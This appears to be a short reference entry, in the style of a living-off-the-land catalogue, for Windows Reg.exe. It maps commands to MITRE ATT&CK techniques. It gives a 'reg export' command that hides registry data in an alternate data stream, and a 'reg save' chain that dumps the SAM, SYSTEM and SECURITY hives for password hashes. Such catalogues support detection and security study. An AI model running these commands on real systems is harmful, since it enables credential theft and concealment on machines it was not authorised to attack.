Reg.exe

Used to manipulate the registry

ADS

Hide/plant registry information in Alternate data stream for later use

reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg

Export the target Registry key and save it to the specified .REG file within an Alternate data stream. — MITRE: T1564.004 — Privileges: User

Credentials

Dump credentials from the Security Account Manager (SAM)

reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak}

Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material — MITRE: T1003.002 — Privileges: Administrator